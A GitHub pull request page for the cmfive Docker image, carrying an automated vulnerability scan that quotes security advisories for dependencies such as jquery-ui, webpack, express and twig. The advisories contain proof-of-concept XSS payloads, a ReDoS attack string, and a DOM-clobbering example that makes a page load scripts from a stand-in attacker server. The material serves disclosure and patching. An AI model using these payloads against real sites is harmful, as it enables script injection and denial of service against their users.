-
Notifications
You must be signed in to change notification settings - Fork 10
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Apply hotfixes to develop #174
Conversation
Release develop changes
Bumps [pipeline-components/php-codesniffer](https://github.com/pipeline-components/php-codesniffer) from 0.32.1 to 0.35.1. - [Release notes](https://github.com/pipeline-components/php-codesniffer/releases) - [Commits](pipeline-components/php-codesniffer@v0.32.1...v0.35.1) --- updated-dependencies: - dependency-name: pipeline-components/php-codesniffer dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Matt Bell <matt@2pisoftware.com>
Overview
Labels (3 changes)
-org.opencontainers.image.created=2024-09-17T23:26:04.758Z
+org.opencontainers.image.created=2024-09-18T01:39:01.983Z
org.opencontainers.image.description=Cmfive in a docker image
org.opencontainers.image.licenses=GPL-3.0
-org.opencontainers.image.revision=4f154f14c3f6bc7d5d96ec7a1aaabe5e149b013a
+org.opencontainers.image.revision=3fbcdf2fcc44ed8f2dc908ceb6707cc5c922ba3c
org.opencontainers.image.source=https://github.com/2pisoftware/cmfive-boilerplate
org.opencontainers.image.title=Cmfive
org.opencontainers.image.url=https://github.com/2pisoftware/cmfive-boilerplate
org.opencontainers.image.vendor=2pisoftware
-org.opencontainers.image.version=develop
+org.opencontainers.image.version=pr-174 Packages and Vulnerabilities (114 package changes and 7 vulnerability changes)
Changes for packages of type
|
🔍 Vulnerabilities of
|
digest | sha256:a6bbcc17412d9cbaabca7d45a7daf7be25b4a414a204d30cd719b1abbdc23cc9 |
vulnerabilities | |
size | 375 MB |
packages | 999 |
📦 Base Image alpine:3.19
also known as |
|
digest | sha256:f11993ab46a7e9f2d09007f8b7cbcc75e48e3691f9ae8d579fe4cb988d7b4ccd |
vulnerabilities |
twig/twig
|
Affected range | >=3.0.0 |
Fixed version | 3.14.0 |
CVSS Score | 8.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H |
EPSS Score | 0.13% |
EPSS Percentile | 49th percentile |
Description
Description
Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.
The security issue happens when all these conditions are met:
- The sandbox is disabled globally;
- The sandbox is enabled via a sandboxed
include()
function which references a template name (likeincluded.twig
) and not aTemplate
orTemplateWrapper
instance;- The included template has been loaded before the
include()
call but in a non-sandbox context (possible as the sandbox has been globally disabled).Resolution
The patch ensures that the sandbox security checks are always run at runtime.
Credits
We would like to thank Fabien Potencier for reporting and fixing the issue.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range | >=3.0.0 |
Fixed version | 3.4.3 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
EPSS Score | 0.33% |
EPSS Percentile | 72nd percentile |
Description
Description
When using the filesystem loader to load templates for which the name is a user input, it is possible to use the
source
orinclude
statement to read arbitrary files from outside the templates directory when using a namespace like@somewhere/../some.file
(in such a case, validation is bypassed).Resolution
We fixed validation for such template names.
Even if the 1.x branch is not maintained anymore, a new version has been released.
Credits
We would like to thank Dariusz Tytko for reporting the issue and Fabien Potencier for fixing the issue.
chart.js 2.5.0
(npm)
pkg:npm/chart.js@2.5.0
# Dockerfile (145:145)
RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core'
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Affected range | <2.9.4 |
Fixed version | 2.9.4 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
EPSS Score | 1.80% |
EPSS Percentile | 88th percentile |
Description
This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution.
path-to-regexp 0.1.7
(npm)
pkg:npm/path-to-regexp@0.1.7
# Dockerfile (154:157)
COPY --chown=cmfive:cmfive \
--from=core \
/cmfive-core/system/templates/base/node_modules \
system/templates/base/node_modules
Inefficient Regular Expression Complexity
Affected range | <0.1.10 |
Fixed version | 0.1.10 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
EPSS Score | 0.04% |
EPSS Percentile | 16th percentile |
Description
Impact
A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (
.
). For example,/:a-:b
.Patches
For users of 0.1, upgrade to
0.1.10
. All other users should upgrade to8.0.0
.These versions add backtrack protection when a custom regex pattern is not provided:
They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.
Version 7.1.0 can enable
strict: true
and get an error when the regular expression might be bad.Version 8.0.0 removes the features that can cause a ReDoS.
Workarounds
All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change
/:a-:b
to/:a-:b([^-/]+)
.If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.
Details
Using
/:a-:b
will produce the regular expression/^\/([^\/]+?)-([^\/]+?)\/?$/
. This can be exploited by a path such as/a${'-a'.repeat(8_000)}/a
. OWASP has a good example of why this occurs, but the TL;DR is the/a
at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the:a-:b
on the repeated 8,000-a
.Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.
References
body-parser 1.20.2
(npm)
pkg:npm/body-parser@1.20.2
# Dockerfile (154:157)
COPY --chown=cmfive:cmfive \
--from=core \
/cmfive-core/system/templates/base/node_modules \
system/templates/base/node_modules
Asymmetric Resource Consumption (Amplification)
Affected range | <1.20.3 |
Fixed version | 1.20.3 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
EPSS Score | 0.04% |
EPSS Percentile | 10th percentile |
Description
Impact
body-parser <1.20.3 is vulnerable to denial of service when url encoding is enabled. A malicious actor using a specially crafted payload could flood the server with a large number of requests, resulting in denial of service.
Patches
this issue is patched in 1.20.3
References
jquery-ui 1.10.4
(npm)
pkg:npm/jquery-ui@1.10.4
# Dockerfile (145:145)
RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core'
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <1.13.0 |
Fixed version | 1.13.0 |
CVSS Score | 6.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |
EPSS Score | 0.45% |
EPSS Percentile | 76th percentile |
Description
Impact
Accepting the value of the
of
option of the.position()
util from untrusted sources may execute untrusted code. For example, invoking the following code:$( "#element" ).position( { my: "left top", at: "right bottom", of: "<img onerror='doEvilThing()' src='/404' />", collision: "none" } );will call the
doEvilThing()
function.Patches
The issue is fixed in jQuery UI 1.13.0. Any string value passed to the
of
option is now treated as a CSS selector.Workarounds
A workaround is to not accept the value of the
of
option from untrusted sources.For more information
If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <1.13.0 |
Fixed version | 1.13.0 |
CVSS Score | 6.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |
EPSS Score | 0.36% |
EPSS Percentile | 73rd percentile |
Description
Impact
Accepting the value of various
*Text
options of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way:$( "#datepicker" ).datepicker( { showButtonPanel: true, showOn: "both", closeText: "<script>doEvilThing( 'closeText XSS' )</script>", currentText: "<script>doEvilThing( 'currentText XSS' )</script>", prevText: "<script>doEvilThing( 'prevText XSS' )</script>", nextText: "<script>doEvilThing( 'nextText XSS' )</script>", buttonText: "<script>doEvilThing( 'buttonText XSS' )</script>", appendText: "<script>doEvilThing( 'appendText XSS' )</script>", } );will call
doEvilThing
with 6 different parameters coming from all*Text
options.Patches
The issue is fixed in jQuery UI 1.13.0. The values passed to various
*Text
options are now always treated as pure text, not HTML.Workarounds
A workaround is to not accept the value of the
*Text
options from untrusted sources.For more information
If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <1.13.0 |
Fixed version | 1.13.0 |
CVSS Score | 6.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N |
EPSS Score | 0.33% |
EPSS Percentile | 71st percentile |
Description
Impact
Accepting the value of the
altField
option of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way:$( "#datepicker" ).datepicker( { altField: "<img onerror='doEvilThing()' src='/404' />", } );will call the
doEvilThing
function.Patches
The issue is fixed in jQuery UI 1.13.0. Any string value passed to the
altField
option is now treated as a CSS selector.Workarounds
A workaround is to not accept the value of the
altField
option from untrusted sources.For more information
If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <1.13.2 |
Fixed version | 1.13.2 |
CVSS Score | 6.1 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
EPSS Score | 0.22% |
EPSS Percentile | 61st percentile |
Description
Impact
Initializing a checkboxradio widget on an input enclosed within a label makes that parent label contents considered as the input label. If you call
.checkboxradio( "refresh" )
on such a widget and the initial HTML contained encoded HTML entities, they will erroneously get decoded. This can lead to potentially executing JavaScript code.For example, starting with the following initial secure HTML:
<label> <input id="test-input"> <img src=x onerror="alert(1)"> </label>and calling:
$( "#test-input" ).checkboxradio(); $( "#test-input" ).checkboxradio( "refresh" );will turn the initial HTML into:
<label> <!-- some jQuery UI elements --> <input id="test-input"> <img src=x onerror="alert(1)"> </label>and the alert will get executed.
Patches
The bug has been patched in jQuery UI 1.13.2.
Workarounds
To remediate the issue, if you can change the initial HTML, you can wrap all the non-input contents of the
label
in aspan
:<label> <input id="test-input"> <span><img src=x onerror="alert(1)"></span> </label>References
https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/
For more information
If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <1.12.0 |
Fixed version | 1.12.0 |
CVSS Score | 6.1 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
EPSS Score | 0.47% |
EPSS Percentile | 76th percentile |
Description
Affected versions of
jquery-ui
are vulnerable to a cross-site scripting vulnerability when arbitrary user input is supplied as the value of thecloseText
parameter in thedialog
function.jQuery-UI is a library for manipulating UI elements via jQuery.
Version 1.11.4 has a cross site scripting (XSS) vulnerability in the
closeText
parameter of thedialog
function. If your application passes user input to this parameter, it may be vulnerable to XSS via this attack vector.Recommendation
Upgrade to jQuery-UI 1.12.0 or later.
express 4.19.2
(npm)
pkg:npm/express@4.19.2
# Dockerfile (154:157)
COPY --chown=cmfive:cmfive \
--from=core \
/cmfive-core/system/templates/base/node_modules \
system/templates/base/node_modules
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <4.20.0 |
Fixed version | 4.20.0 |
CVSS Score | 5 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L |
EPSS Score | 0.04% |
EPSS Percentile | 10th percentile |
Description
Impact
In express <4.20.0, passing untrusted user input - even after sanitizing it - to
response.redirect()
may execute untrusted codePatches
this issue is patched in express 4.20.0
Workarounds
users are encouraged to upgrade to the patched version of express, but otherwise can workaround this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist
Details
successful exploitation of this vector requires the following:
- The attacker MUST control the input to response.redirect()
- express MUST NOT redirect before the template appears
- the browser MUST NOT complete redirection before:
- the user MUST click on the link in the template
serve-static 1.15.0
(npm)
pkg:npm/serve-static@1.15.0
# Dockerfile (154:157)
COPY --chown=cmfive:cmfive \
--from=core \
/cmfive-core/system/templates/base/node_modules \
system/templates/base/node_modules
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <1.16.0 |
Fixed version | 1.16.0 |
CVSS Score | 5 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L |
EPSS Score | 0.04% |
EPSS Percentile | 16th percentile |
Description
Impact
passing untrusted user input - even after sanitizing it - to
redirect()
may execute untrusted codePatches
this issue is patched in serve-static 1.16.0
Workarounds
users are encouraged to upgrade to the patched version of express, but otherwise can workaround this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist
Details
successful exploitation of this vector requires the following:
- The attacker MUST control the input to response.redirect()
- express MUST NOT redirect before the template appears
- the browser MUST NOT complete redirection before:
- the user MUST click on the link in the template
send 0.18.0
(npm)
pkg:npm/send@0.18.0
# Dockerfile (154:157)
COPY --chown=cmfive:cmfive \
--from=core \
/cmfive-core/system/templates/base/node_modules \
system/templates/base/node_modules
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <0.19.0 |
Fixed version | 0.19.0 |
CVSS Score | 5 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L |
EPSS Score | 0.04% |
EPSS Percentile | 10th percentile |
Description
Impact
passing untrusted user input - even after sanitizing it - to
SendStream.redirect()
may execute untrusted codePatches
this issue is patched in send 0.19.0
Workarounds
users are encouraged to upgrade to the patched version of express, but otherwise can workaround this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist
Details
successful exploitation of this vector requires the following:
- The attacker MUST control the input to response.redirect()
- express MUST NOT redirect before the template appears
- the browser MUST NOT complete redirection before:
- the user MUST click on the link in the template
webpack 5.93.0
(npm)
pkg:npm/webpack@5.93.0
# Dockerfile (154:157)
COPY --chown=cmfive:cmfive \
--from=core \
/cmfive-core/system/templates/base/node_modules \
system/templates/base/node_modules
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | >=5.0.0-alpha.0 |
Fixed version | 5.94.0 |
CVSS Score | 6.4 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H |
EPSS Score | 0.06% |
EPSS Percentile | 26th percentile |
Description
Summary
We discovered a DOM Clobbering vulnerability in Webpack’s
AutoPublicPathRuntimeModule
. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., animg
tag with an unsanitizedname
attribute) are present.We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/Gadgets found in Webpack
We identified a DOM Clobbering vulnerability in Webpack’s
AutoPublicPathRuntimeModule
. When theoutput.publicPath
field in the configuration is not set or is set toauto
, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:/******/ /* webpack/runtime/publicPath */ /******/ (() => { /******/ var scriptUrl; /******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + ""; /******/ var document = __webpack_require__.g.document; /******/ if (!scriptUrl && document) { /******/ if (document.currentScript) /******/ scriptUrl = document.currentScript.src; /******/ if (!scriptUrl) { /******/ var scripts = document.getElementsByTagName("script"); /******/ if(scripts.length) { /******/ var i = scripts.length - 1; /******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src; /******/ } /******/ } /******/ } /******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration /******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic. /******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser"); /******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/"); /******/ __webpack_require__.p = scriptUrl; /******/ })();
However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with
document.currentScript
can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, thesrc
attribute of the attacker-controlled element will be used as thescriptUrl
and assigned to__webpack_require__.p
. If additional scripts are loaded from the server,__webpack_require__.p
will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.PoC
Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.
Consider a website developer with the following two scripts,
entry.js
andimport1.js
, that are compiled using Webpack:// entry.js import('./import1.js') .then(module => { module.hello(); }) .catch(err => { console.error('Failed to load module', err); });
// import1.js export function hello () { console.log('Hello'); }
The webpack.config.js is set up as follows:
const path = require('path'); module.exports = { entry: './entry.js', // Ensure the correct path to your entry file output: { filename: 'webpack-gadgets.bundle.js', // Output bundle file path: path.resolve(__dirname, 'dist'), // Output directory publicPath: "auto", // Or leave this field not set }, target: 'web', mode: 'development', };
When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the
import1.js
file from the attacker's domain,attacker.controlled.server
. The attacker only needs to insert animg
tag with thename
attribute set tocurrentScript
. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.<!DOCTYPE html> <html> <head> <title>Webpack Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!> </head> <script src="./dist/webpack-gadgets.bundle.js"></script> <body> </body> </html>
Impact
This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.
Patch
A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174
/******/ /* webpack/runtime/publicPath */ /******/ (() => { /******/ var scriptUrl; /******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + ""; /******/ var document = __webpack_require__.g.document; /******/ if (!scriptUrl && document) { /******/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :> /******/ scriptUrl = document.currentScript.src; /******/ if (!scriptUrl) { /******/ var scripts = document.getElementsByTagName("script"); /******/ if(scripts.length) { /******/ var i = scripts.length - 1; /******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src; /******/ } /******/ } /******/ } /******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration /******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic. /******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser"); /******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/"); /******/ __webpack_require__.p = scriptUrl; /******/ })();
Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.
aws/aws-sdk-php 3.224.0
(composer)
pkg:composer/aws/aws-sdk-php@3.224.0
# Dockerfile (145:145)
RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core'
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range | <3.288.1 |
Fixed version | 3.288.1 |
CVSS Score | 6 |
CVSS Vector | CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N |
EPSS Score | 0.04% |
EPSS Percentile | 16th percentile |
Description
Impact
Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the
buildEndpoint
method in theRestSerializer
component of the AWS SDK for PHP v3 prior to 3.288.1. ThebuildEndpoint
method relies on the Guzzle Psr7UriResolver
utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed.Versions of the AWS SDK for PHP v3 before 3.288.1 are affected by this issue.
Patches
Upgrade to the AWS SDK for PHP >= 3.288.1, if you are on version < 3.288.1.
References
RFC 3986 - https://datatracker.ietf.org/doc/html/rfc3986
For more information
If you have any questions or comments about this advisory, please contact AWS's Security team.
codemirror 4.4.0
(npm)
pkg:npm/codemirror@4.4.0
# Dockerfile (145:145)
RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core'
Uncontrolled Resource Consumption
Affected range | <5.58.2 |
Fixed version | 5.58.2 |
CVSS Score | 5.3 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
EPSS Score | 1.71% |
EPSS Percentile | 88th percentile |
Description
This affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2.
The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/.?/)
No description provided.